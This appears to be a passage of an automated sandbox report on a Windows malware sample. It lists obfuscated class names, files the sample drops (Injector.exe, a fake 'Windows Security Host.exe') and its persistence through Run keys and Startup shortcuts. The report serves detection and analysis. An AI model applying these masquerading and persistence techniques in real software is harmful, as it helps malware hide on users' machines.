'OA2Y2mutcuZCMyuD3JXI0NbB0SqNdFEr2zmRRkam'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csHigh entropy of concatenated method names: 'nMqyhawtoA24xIuxIlptmwHWKsfTnFGLPZYUqdN9', 'dkKJ2Ath9TgOHMiUghO6R4hPmK8Xw5fmDoyNV5P7', 'BPpR7Ihy5fuOMuoqs7TQjosfgUVIZ22jYpx9bPHG', 'LXUSQL8p3GARl1t1DUhLmf0RYQlxGggBkC5PbzpP', 'mibSVfQ5vcknf04M1C1usZuxFTDSyiZfp2N24mpl', '_4oD51RdiUFYtMo1halOtlbwbXPb6uBBoeS5ypGsR', 'rpl1WfPD4F66gyyTij9oLXwcuDh7jputgu2gpVmI', 'vKUNX0ELXQW2QGnW9wpnTvdnaS9fHwA0A6zv7Svf', 'ib2jtjbB3jlpY3YH7Tg8jBzi0CnlnQlDfHHaUDeO', 'JURZnwyOMeCJOjZP1CcqQ4r4zObCsDNqiKp4oYEB'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.csHigh entropy of concatenated method names: 'gwdBiDGrsqra4xJDEVRAAHk8ixWQMtISqaOJ0eCA', 'o3HWCRkvMkpvSZB20yl1pF7FU8wPRHVFnGESfuPNUY9JXs6BXOmzmhy9s', 'qMmdryJ92VOoGpffxkNicZMZIa7I4Itnx1MnCozVhSTnHOlt9MXB60dCL', 'Pz6T4a3ONk9BHptTHm0ebvVVwUVX51tvvdrSLqRUg5nfFo0e3KJGdVTEQ', 'X743L84zyetr9mkRrCNo6pI1vOOCPya9yVGOKeEwJPc9RaOQskAzT0mCZ'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csHigh entropy of concatenated method names: 'TPKhuDz4s1rf8i1hwqc2QMGg2UsV554vOm7i1AZ3KylU9pSjoUm05dL', 'cRhOtQfLozT80pWem0pirZy7pbnycZ3QwlB4JpKR1vCz51OSpkaOaTW', 'AJaac4JmemH2rsVa7lRrDmlnr2JC8lkgHeZGLSuU3cBilefGFbLeyOm', 'V7pa2Sc0gIB6xlLp8hlR185xs6zHDAgeTucJr9PGvASsfB0UEey6Oq6', 'Yr9oFPBU6ubOrG5zzpzNARhs7OSfaSkoOG6l3NRsMK8HYxu8S3QtIUB', 'ZUZzZaytAPji40S1dtCDVgZ0LcSJ0j27gVA1ZGtttHycnaf3zFzt2h7', 'GUnAuukad8VQsTQYfnD6x6Fpwvm7mkL8WPXhduRX348d0ZpldeYzDQ5', '_7c85FFD3oacggbQwxP2IM8lsbcjqrI9rjMGlWFrFpqhX72fwmFR8lBj', 'j4MedkzxJYMH1i3xVxph16gRvdEfFMyqJ3M4sqCgCg7Og7sp6f8wJc1', 'irUSf4pIDk7ubW7NNL4w6RiLKDzrDHEtkBSnsaggCZFS8x4uRM5dBye'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.csHigh entropy of concatenated method names: 'UWl6q1tllqEQvYndtdinpjTk8r0RWn1697idwuzTDx6BhexflmYJ2dU', 'l3UqPE30ijk1rA7iiMlD6uHMWW44RKAn0GsYYXfoonm2RKO0N96BFbo', 'rJCMhP4h7Og0wKAV85o7J39PyMu66yeQtbJb5iPLftfXOFJloVQxw6H', 'ox1KIzQ8N3KwianZxJ388IvIKMZKyRdf5Rq2Axm7YHgsn5XIMVK2H1O', 'oz94QYmoZ1n9yrPPxv4DH4biNmUSZwT51KY7Cwzg7EOTtZtzFSEABUW', 'tNoOd4KzCCvrj98IsqK5cgzZEvh7aF66nLyJpo32UhQqHuJso4KE3GGCWhCmI130ZF5wlTS4', 'DMiNRlVGn3v8eBi2x05rnJ6NPDNYXx1gaX7XvR4RDwQbWac9JTNyzMBGGTuieEbjfS0cx8Zh', 'huqcnufBpqYs9kQ4UnseK72wuRhbEmSCXYwQtqwjN4CFhD4ZqfFUmPTk8wzYP3MmBEFFop9K', '_2DYmVyFxTcStEhswOvIoIAImlrjVqo4OHwf7uXdTlwY45VVg8urKvP0QAjLbjlG3FhgLPyC4', 'bJ49487JZH0h3KuPyE7nCxT3wiTZxYEVNGGjelqZDWkJCXgs5nCw64cNFunmDuWInLRxxhFA'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, mzsbakNglaER3LKxVTydaTROCw6IGp8wfTPLVmdZ.csHigh entropy of concatenated method names: 'Q1lY74VbQ4HPiyjyEy8FkRqehrkKk9b02JKt5mfN', 'bjuyZK2t7i6FCrci4IwFKhprso6J4s1zinnbj9mYeCcfkTnSW6lL9OBJR', '_1BVyv1KlKzatjWbnYHz6oSSHvfDumsLHrOeA4wdiX5kAoOpa6tiIk0f3Q', 'cc4awgwWvVPvUALiJ7wJntzSlbcGWn3JeD1U77MUVERXgdn5mZgfNMSYP', 'vdqcUf0ULR2Ql9ijYKvl9Dqxxn62pYGqiXiTnNwqv2MP5cQGZugtxBNyP'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, GWYxCOLqDOSWCLC3OG7xybolFnfHf1CzbiM9fHDC.csHigh entropy of concatenated method names: '_2wMZuA6jmIytnkRIwWH0lqZw7LIBE9V3QHKp7Mke', 'bd8gO9tsieaFCGyalOw8vq0qhCXtNoHnshRbKDNQ', 'z7AzFkomS0LUj194z315YdBWwnjNzXoCAWSsrKfb', 'DIljgHyfeWUsj6TlEPYK1rADoYqAPfp1ZiBx9HOk', '_6mWR3tOHUygNZihtjS3S3Y0AkQygbkfGmos0PN2c', 'og8OXj7OIhc5FtcOPCJPieYQH4Fg18CiEb7Qgs5s', 'P5CEoPF5i0mWht3ttKY5FZaUtf6YC5f8okAqJrl3', 'DPMnVeYYzbsm4w0rOUrg2fiB5DAumi1Yq4ZnU0Tw', 'l16dhBsaRlPGiO5OYXn5CCcZWDk9C5T1yX4StPCZ', 'CClexRkZSfofMTN5sD2jl4C80ZQ4BvQ31hs5CROF'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, kGWyFLzwGo1x3FHf7gkFoqhjADWohiyUpAlG1Wdv.csHigh entropy of concatenated method names: 'eKDrezHiHFH4nDVWsJUkqDakojPPfGvRSIeoCGAu', 'RGpeD9ZyFVNo3DGQc0iu6XnZ5qm2hqJguEsGnRrU', 'ZrvakkhboWtWhTPIKnioCkXAWPPppxTdt5LmV8Xw', 'FeKYJSRu8xpJDE6vqKDJLUnDs7LaQvo0IL8LKXOb', 'VHn7mZvZGguiJQgUtk3ERNVEKjevviaOJO9fiLBuVsZihRyDOUoh1T4Fr', 'PzIi4HCZWxkpY13cUeNCFhCwrlFPJFIA3PgzUe8KICDXUqU6LkXadCG3Q', 'IbdnY17WXJp3tISDz1bmw18R2nhAY4N01GyYv75arjSliz7OV64HohZIb', '_5BUa1nZHKmRvfOV6AJM1UamikedsjY8MJGGaeBkcNpM0nGugS035IU2IL', 's1PVejoGdKHkRMGHi2Q9ERoME74Op1LuTFSI3eP8ZgIob5ccdW7TxrQrn', 'KLbXMDx9NTK4Z0wyHTmJGa45lihRyIJsY02l2JocyAOwDWifSoNpamqkT'
                    Source: Windows Security Host.exe.3.dr, Hack4BQFI25fjaBNRAgg7o1cJuSJYApNkWzwGV1K.csHigh entropy of concatenated method names: 'fUaHi915Q2SCY4vatUCg5JS73gHa4SRSgz9a4Iph', 'ym11NVLutZRyymekaMkNX6RXHRAEwMZaVle9qIEr', 'DsGK73xG4SufqS3g4FJRUb8ujF0JLOI4Dy82fG4x', 'mqs8mPuBqHXiB7zQHUi2mNoZy8vJqGHkUT0CmSHNi2NnvMRzxssrCqjm8VaeO5q7r0msTw6UTlXCCGAINkhGOAqopO', 'YEAij0svkgkGFvxSR8j0NLfx0o39uOHnoEwzTHav9LLlRLUr0unxNElOo5zVZKEnm7LMx08owypsnt4osoh1hi2aeO', 'IhB9suP04ABwxnKjapODuJlTZGintCvMvus8eEUpKsNPBrvoRVqMYkdLBqIdo8sufoIlqif6DPalwIalps9higKuqL', 'rRRL1Tzs76hOBNZZE9J8OyN191KlX2Zua4qHcRurl3rYxw9qQj3dQJVLLOCfHqdJIHSyBgsDUoyFcaeOFrVAdhTcPa', '_2krxW3K1nVwn1psV5pxeR5rOzAM1FYYQ8WYOgznQ3vGMf8pLAxDlTCP8lMlm2BELLsWbUsRgtQxHQngLOtPrLZegt1', 'He0a2h4bt1MEb6K6iOiOpT4n4iGzhSJOYP9R8klgc5LsFcDNY4tJyT6Jsj6nbUaMNLollDYIBTB7dv6e7PIKIkM5fe', 'rwmklMnQjcQRsAVWs6gm4avIaROxOY0jJbUqWJlRuMET7qNlviyrNJFUnTL1zXchptI6S1qBCuU91jVZWVcdL1kUVw'
                    Source: Windows Security Host.exe.3.dr, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.csHigh entropy of concatenated method names: 'MN8ERM3Z7FBRl3Zg8JQhw3aqRsEPhqVkQNTiletuPm9KE9HuFTUNm8ftCO8OB3ufO7FEUZnJ', 'o36wxU1HlWqf5SgBFVDXAxjVdkkWAvnnFpE2ycR3WIkH0GVFAGV3YGURabPwFHo80TIQhGqK', 'PoCuA8O3oyIuHQMZKDDvNEyGf7s2iu8bvCMn6F9NvnAIAYjgvZ2E5tgMknmEqueR4vcD5w0k', 'f2ee6ydpQQMb1mqxGTd9yqXKOhq7lwXE6csu2Ly07TH43DhnUryiDmV2J9PlJdfNxN7JAjbR'
                    Source: Windows Security Host.exe.3.dr, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'XRSbeAtfgYh7Kxptedlsp8xqd7xGLTHWVMdpVwoC1pBfTNxGkjcdApxcOkNqSvCf0ZVjXcW4', '_4OxmFCSdwAhhRFUy08Hfrto0pBgjFdzmrMnOcS1EtaRsrUWzWVzeWb8Sbf0Rteu0mY2ckHiT', '_2VHg99hYV8ztmyyHua3f3n1NHwtunTTvPf5tQtiijBKEyDfnRFevJg1NyhW12dkwY0SAEs1H', 'hNl93BgmIFdzfAPlUMFzRiK1L0ZFMkdjwYLlBAd8Bl3eOfkqDuoYeIAClwUy3EajsREUqzXx'
                    Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.csHigh entropy of concatenated method names: 'Rm8FpaieZMoW7z264rwb8bz2H4c6aHp7Zm9YjgtPENyjw36t3xrA1TG', 'U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS', 'ACAK89aZu2VzBZzFwLe5rT07V13pTwQX1KvSun2hM7yPr4VggBMTLHW', 'r2Frn0E0r7vvmo5i6oVO7doevY9d2pMj5XxfKdJPBB87BDFwDCpH3HB', 'DLhjX4mF0CaPUxa2ro80Inw17SJhzceCWBzhzO0XvNPOnlBEAXjNxbF', 'W5YqEwH4kesxhRqTE8cNqHwkdORdaiyXAGJpGFKqyrlINzkwUs4j7oC', 'Wz7IZYizEXhCHMcepDfJNxEUHgICm0GABfdMcPCVBKUH1I6omKhG6wb', 'XtDzhljwkL9BW8rl2Twvx5I3CNX2p2q5XHUZSmKXVC9gsPyoDUnjPjD', 'zw3YUhNglyha13YdAfNFYNIlLApZXat23upzIHyaJ66NXiIaRSfc7tn', 'OA2Y2mutcuZCMyuD3JXI0NbB0SqNdFEr2zmRRkam'
                    Source: Windows Security Host.exe.3.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csHigh entropy of concatenated method names: 'nMqyhawtoA24xIuxIlptmwHWKsfTnFGLPZYUqdN9', 'dkKJ2Ath9TgOHMiUghO6R4hPmK8Xw5fmDoyNV5P7', 'BPpR7Ihy5fuOMuoqs7TQjosfgUVIZ22jYpx9bPHG', 'LXUSQL8p3GARl1t1DUhLmf0RYQlxGggBkC5PbzpP', 'mibSVfQ5vcknf04M1C1usZuxFTDSyiZfp2N24mpl', '_4oD51RdiUFYtMo1halOtlbwbXPb6uBBoeS5ypGsR', 'rpl1WfPD4F66gyyTij9oLXwcuDh7jputgu2gpVmI', 'vKUNX0ELXQW2QGnW9wpnTvdnaS9fHwA0A6zv7Svf', 'ib2jtjbB3jlpY3YH7Tg8jBzi0CnlnQlDfHHaUDeO', 'JURZnwyOMeCJOjZP1CcqQ4r4zObCsDNqiKp4oYEB'
                    Source: Windows Security Host.exe.3.dr, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.csHigh entropy of concatenated method names: 'gwdBiDGrsqra4xJDEVRAAHk8ixWQMtISqaOJ0eCA', 'o3HWCRkvMkpvSZB20yl1pF7FU8wPRHVFnGESfuPNUY9JXs6BXOmzmhy9s', 'qMmdryJ92VOoGpffxkNicZMZIa7I4Itnx1MnCozVhSTnHOlt9MXB60dCL', 'Pz6T4a3ONk9BHptTHm0ebvVVwUVX51tvvdrSLqRUg5nfFo0e3KJGdVTEQ', 'X743L84zyetr9mkRrCNo6pI1vOOCPya9yVGOKeEwJPc9RaOQskAzT0mCZ'
                    Source: Windows Security Host.exe.3.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csHigh entropy of concatenated method names: 'TPKhuDz4s1rf8i1hwqc2QMGg2UsV554vOm7i1AZ3KylU9pSjoUm05dL', 'cRhOtQfLozT80pWem0pirZy7pbnycZ3QwlB4JpKR1vCz51OSpkaOaTW', 'AJaac4JmemH2rsVa7lRrDmlnr2JC8lkgHeZGLSuU3cBilefGFbLeyOm', 'V7pa2Sc0gIB6xlLp8hlR185xs6zHDAgeTucJr9PGvASsfB0UEey6Oq6', 'Yr9oFPBU6ubOrG5zzpzNARhs7OSfaSkoOG6l3NRsMK8HYxu8S3QtIUB', 'ZUZzZaytAPji40S1dtCDVgZ0LcSJ0j27gVA1ZGtttHycnaf3zFzt2h7', 'GUnAuukad8VQsTQYfnD6x6Fpwvm7mkL8WPXhduRX348d0ZpldeYzDQ5', '_7c85FFD3oacggbQwxP2IM8lsbcjqrI9rjMGlWFrFpqhX72fwmFR8lBj', 'j4MedkzxJYMH1i3xVxph16gRvdEfFMyqJ3M4sqCgCg7Og7sp6f8wJc1', 'irUSf4pIDk7ubW7NNL4w6RiLKDzrDHEtkBSnsaggCZFS8x4uRM5dBye'
                    Source: Windows Security Host.exe.3.dr, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.csHigh entropy of concatenated method names: 'UWl6q1tllqEQvYndtdinpjTk8r0RWn1697idwuzTDx6BhexflmYJ2dU', 'l3UqPE30ijk1rA7iiMlD6uHMWW44RKAn0GsYYXfoonm2RKO0N96BFbo', 'rJCMhP4h7Og0wKAV85o7J39PyMu66yeQtbJb5iPLftfXOFJloVQxw6H', 'ox1KIzQ8N3KwianZxJ388IvIKMZKyRdf5Rq2Axm7YHgsn5XIMVK2H1O', 'oz94QYmoZ1n9yrPPxv4DH4biNmUSZwT51KY7Cwzg7EOTtZtzFSEABUW', 'tNoOd4KzCCvrj98IsqK5cgzZEvh7aF66nLyJpo32UhQqHuJso4KE3GGCWhCmI130ZF5wlTS4', 'DMiNRlVGn3v8eBi2x05rnJ6NPDNYXx1gaX7XvR4RDwQbWac9JTNyzMBGGTuieEbjfS0cx8Zh', 'huqcnufBpqYs9kQ4UnseK72wuRhbEmSCXYwQtqwjN4CFhD4ZqfFUmPTk8wzYP3MmBEFFop9K', '_2DYmVyFxTcStEhswOvIoIAImlrjVqo4OHwf7uXdTlwY45VVg8urKvP0QAjLbjlG3FhgLPyC4', 'bJ49487JZH0h3KuPyE7nCxT3wiTZxYEVNGGjelqZDWkJCXgs5nCw64cNFunmDuWInLRxxhFA'
                    Source: Windows Security Host.exe.3.dr, mzsbakNglaER3LKxVTydaTROCw6IGp8wfTPLVmdZ.csHigh entropy of concatenated method names: 'Q1lY74VbQ4HPiyjyEy8FkRqehrkKk9b02JKt5mfN', 'bjuyZK2t7i6FCrci4IwFKhprso6J4s1zinnbj9mYeCcfkTnSW6lL9OBJR', '_1BVyv1KlKzatjWbnYHz6oSSHvfDumsLHrOeA4wdiX5kAoOpa6tiIk0f3Q', 'cc4awgwWvVPvUALiJ7wJntzSlbcGWn3JeD1U77MUVERXgdn5mZgfNMSYP', 'vdqcUf0ULR2Ql9ijYKvl9Dqxxn62pYGqiXiTnNwqv2MP5cQGZugtxBNyP'
                    Source: Windows Security Host.exe.3.dr, GWYxCOLqDOSWCLC3OG7xybolFnfHf1CzbiM9fHDC.csHigh entropy of concatenated method names: '_2wMZuA6jmIytnkRIwWH0lqZw7LIBE9V3QHKp7Mke', 'bd8gO9tsieaFCGyalOw8vq0qhCXtNoHnshRbKDNQ', 'z7AzFkomS0LUj194z315YdBWwnjNzXoCAWSsrKfb', 'DIljgHyfeWUsj6TlEPYK1rADoYqAPfp1ZiBx9HOk', '_6mWR3tOHUygNZihtjS3S3Y0AkQygbkfGmos0PN2c', 'og8OXj7OIhc5FtcOPCJPieYQH4Fg18CiEb7Qgs5s', 'P5CEoPF5i0mWht3ttKY5FZaUtf6YC5f8okAqJrl3', 'DPMnVeYYzbsm4w0rOUrg2fiB5DAumi1Yq4ZnU0Tw', 'l16dhBsaRlPGiO5OYXn5CCcZWDk9C5T1yX4StPCZ', 'CClexRkZSfofMTN5sD2jl4C80ZQ4BvQ31hs5CROF'
                    Source: Windows Security Host.exe.3.dr, kGWyFLzwGo1x3FHf7gkFoqhjADWohiyUpAlG1Wdv.csHigh entropy of concatenated method names: 'eKDrezHiHFH4nDVWsJUkqDakojPPfGvRSIeoCGAu', 'RGpeD9ZyFVNo3DGQc0iu6XnZ5qm2hqJguEsGnRrU', 'ZrvakkhboWtWhTPIKnioCkXAWPPppxTdt5LmV8Xw', 'FeKYJSRu8xpJDE6vqKDJLUnDs7LaQvo0IL8LKXOb', 'VHn7mZvZGguiJQgUtk3ERNVEKjevviaOJO9fiLBuVsZihRyDOUoh1T4Fr', 'PzIi4HCZWxkpY13cUeNCFhCwrlFPJFIA3PgzUe8KICDXUqU6LkXadCG3Q', 'IbdnY17WXJp3tISDz1bmw18R2nhAY4N01GyYv75arjSliz7OV64HohZIb', '_5BUa1nZHKmRvfOV6AJM1UamikedsjY8MJGGaeBkcNpM0nGugS035IU2IL', 's1PVejoGdKHkRMGHi2Q9ERoME74Op1LuTFSI3eP8ZgIob5ccdW7TxrQrn', 'KLbXMDx9NTK4Z0wyHTmJGa45lihRyIJsY02l2JocyAOwDWifSoNpamqkT'

                    Persistence and Installation Behavior

                    barindex
                    Uses ipconfig to lookup or modify the Windows network settings
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeFile created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile created: C:\Users\user\Windows Security Host.exeJump to dropped file
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeFile created: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeJump to dropped file
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeFile created: C:\Users\user\AppData\Local\Temp\Injector.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile created: C:\Users\user\Windows Security Host.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops PE files to the user root directory
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile created: C:\Users\user\Windows Security Host.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Security HostJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Security HostJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
